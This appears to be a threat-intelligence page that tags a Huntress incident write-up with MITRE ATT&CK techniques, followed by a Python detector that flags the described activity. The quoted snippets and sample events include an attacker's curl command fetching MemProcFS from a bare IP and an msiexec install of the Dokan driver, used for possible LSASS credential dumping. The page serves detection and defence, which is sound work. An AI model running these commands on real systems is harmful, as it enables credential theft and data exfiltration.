TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Huntress

Curling for Data: A Dive into a Threat Actor's Malicious TTPs | Huntress

2023-12-14

ATT&CK techniques detected

12 predictions
T1003.001 LSASS Memory · 99%
“…, T1059.003 Windows Command Shell - Persistence - T1078 Valid Accounts - Credential Access (possible) - T1003.001 LSASS Memory - Collection - T1560 Archive Collected Data - Data Exfiltration - T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol”

T1003.001 LSASS Memory · 89%
“…i file download, for installation of the Dokan file system driver: curl -v -o memprocfs.zip http://193.149.176.90/memprocfs.zip "C:\Windows\System32\msiexec.exe" /i "C:\Users\Public\dokan_x64.msi\dokan_x64.msi" Possible credential dumpi…”

T1005 Data from Local System · 84%
“…and persisted beyond the deletion of the driver from the endpoint. The use of the file system driver to create the mount point, and then later remove it, spanned 7 minutes and 4 seconds. Data Exfiltration in the Wild Shortly after the Dokan file system driver was removed, another …”

T1219 Remote Access Tools · 79%
“Curling for Data: A Dive into a Threat Actor's Malicious TTPs | Huntress The Huntress agent was recently added to a new customer's environment as a result of suspicious activity they'd become aware of, and not long after, Huntress SOC analysts alerted the customer to furth…”

T1105 Ingress Tool Transfer · 65%
“…-2023 08:24:28 <unknown> RemoteControl {<GUID>} This particular entry stood out due to the <unknown> field, where all previous entries contained valid account names specific to the environment. Also, per the timeline of events created for this investigation, the time…”

T1219.002 Remote Desktop Software · 62%
“Curling for Data: A Dive into a Threat Actor's Malicious TTPs | Huntress The Huntress agent was recently added to a new customer's environment as a result of suspicious activity they'd become aware of, and not long after, Huntress SOC analysts alerted the customer to furth…”

T1059.001 PowerShell · 50%
“…i file download, for installation of the Dokan file system driver: curl -v -o memprocfs.zip http://193.149.176.90/memprocfs.zip "C:\Windows\System32\msiexec.exe" /i "C:\Users\Public\dokan_x64.msi\dokan_x64.msi" Possible credential dumpi…”

T1078 Valid Accounts · 38%
“…exfiltration. Conclusion Huntress analysts were not able to determine how the threat actor was able to obtain credentials for known, valid accounts, as it's likely that credential access occurred on one or more endpoints within the environment prior to the Huntress agent being …”

T1048 Exfiltration Over Alternative Protocol · 36%
“…and persisted beyond the deletion of the driver from the endpoint. The use of the file system driver to create the mount point, and then later remove it, spanned 7 minutes and 4 seconds. Data Exfiltration in the Wild Shortly after the Dokan file system driver was removed, another …”

T1059 Command and Scripting Interpreter · 32%
“…exfiltration. Conclusion Huntress analysts were not able to determine how the threat actor was able to obtain credentials for known, valid accounts, as it's likely that credential access occurred on one or more endpoints within the environment prior to the Huntress agent being …”

T1005 Data from Local System · 31%
“…, T1059.003 Windows Command Shell - Persistence - T1078 Valid Accounts - Credential Access (possible) - T1003.001 LSASS Memory - Collection - T1560 Archive Collected Data - Data Exfiltration - T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol”

T1003 OS Credential Dumping · 31%
“…i file download, for installation of the Dokan file system driver: curl -v -o memprocfs.zip http://193.149.176.90/memprocfs.zip "C:\Windows\System32\msiexec.exe" /i "C:\Users\Public\dokan_x64.msi\dokan_x64.msi" Possible credential dumpi…”
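The observable pieces of the procedure quoted in the snippets above are a curl download of memprocfs.zip from a bare IP, an msiexec install of a Dokan package staged under C:\Users\Public, and a RemoteControl entry whose account field reads <unknown> instead of a valid account name. As an added example (not code from the Huntress write-up or from TTPwire), the Python below runs a small tagger over constructed events modelled on those lines: each event is labelled with the ATT&CK technique it evidences on its own, and a memprocfs download followed by a Dokan install on the same host is chained into the "possible LSASS memory" finding, since MemProcFS mounts memory as a file system through the Dokan driver. The event schema, host names, timestamps, account names and the 30-minute correlation window are assumptions; the two command lines are the ones quoted on this page, and a benign curl download from a named host is included as a control.

```python
import re
from datetime import datetime, timedelta

# Ingress tool transfer by curl: a -o/-O download whose URL host is a bare
# IPv4 address, as in the command line quoted on this page.
CURL_DOWNLOAD = re.compile(r"\bcurl\b.*?\s-[oO]\s", re.IGNORECASE)
BARE_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/", re.IGNORECASE)
# msiexec installing a package staged in the world-writable C:\Users\Public.
MSI_FROM_PUBLIC = re.compile(r'msiexec(?:\.exe)?"?\s+/i\s+"?c:\\users\\public\\', re.IGNORECASE)
DOKAN = re.compile(r"dokan", re.IGNORECASE)
# Assumed correlation window between the tool download and the driver install.
WINDOW = timedelta(minutes=30)

NAMES = {
    "T1105": "Ingress Tool Transfer",
    "T1003.001": "OS Credential Dumping: LSASS Memory (possible)",
    "T1219": "Remote Access Tools",
}

# Constructed sample events. Hosts, timestamps and account names are made up;
# the curl and msiexec command lines are the ones quoted on this page.
SAMPLE_EVENTS = [
    {"ts": "2023-11-15 08:10:02", "host": "WS01", "user": "<unknown>",
     "cmdline": "RemoteControl {<GUID>}"},
    {"ts": "2023-11-15 08:12:40", "host": "WS01", "user": "user1",
     "cmdline": "curl -v -o memprocfs.zip http://193.149.176.90/memprocfs.zip"},
    {"ts": "2023-11-15 08:14:05", "host": "WS01", "user": "user1",
     "cmdline": r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\Public\dokan_x64.msi\dokan_x64.msi"'},
    # Benign control: curl download from a named internal host, no tag expected.
    {"ts": "2023-11-15 09:00:00", "host": "WS02", "user": "user2",
     "cmdline": "curl -o report.pdf https://intranet.example.com/report.pdf"},
]


def tag_event(ev):
    """Techniques a single event evidences on its own."""
    tags = set()
    cmd = ev["cmdline"]
    if CURL_DOWNLOAD.search(cmd) and BARE_IP_URL.search(cmd):
        tags.add("T1105")
    if MSI_FROM_PUBLIC.search(cmd):
        tags.add("T1105")  # staged installer executed from a public directory
    # Remote-control session whose account field is <unknown> rather than a
    # valid account name, the anomaly the page's timeline entry highlights.
    if cmd.lower().startswith("remotecontrol") and ev["user"] == "<unknown>":
        tags.add("T1219")
    return tags


def correlate(events):
    """Per host, chain a memprocfs download to a later Dokan install within
    WINDOW; that pair is the 'possible credential dumping' the page describes.
    Returns (host, ts, sorted technique IDs) for every tagged event."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)
    findings = []
    for host, evs in by_host.items():
        memprocfs_at = None
        for ev in evs:
            t = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
            tags = tag_event(ev)
            if "T1105" in tags and "memprocfs" in ev["cmdline"].lower():
                memprocfs_at = t
            if (DOKAN.search(ev["cmdline"]) and MSI_FROM_PUBLIC.search(ev["cmdline"])
                    and memprocfs_at is not None and t - memprocfs_at <= WINDOW):
                tags.add("T1003.001")
            if tags:
                findings.append((host, ev["ts"], sorted(tags)))
    return findings


if __name__ == "__main__":
    for host, ts, tags in correlate(SAMPLE_EVENTS):
        print(host, ts, ", ".join(f"{t} {NAMES[t]}" for t in tags))
```

The per-event rules deliberately tag only what the quoted lines show (a bare-IP curl download, an installer run from a public directory, a remote-control entry with no valid account); the T1003.001 label is only attached once the download and the Dokan install are seen together on one host, which is the same "possible" qualification the page's own technique list carries.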

Summary

Huntress analysts recently observed a novel set of tactics, techniques, and procedures used by a threat actor for data collection and exfiltration.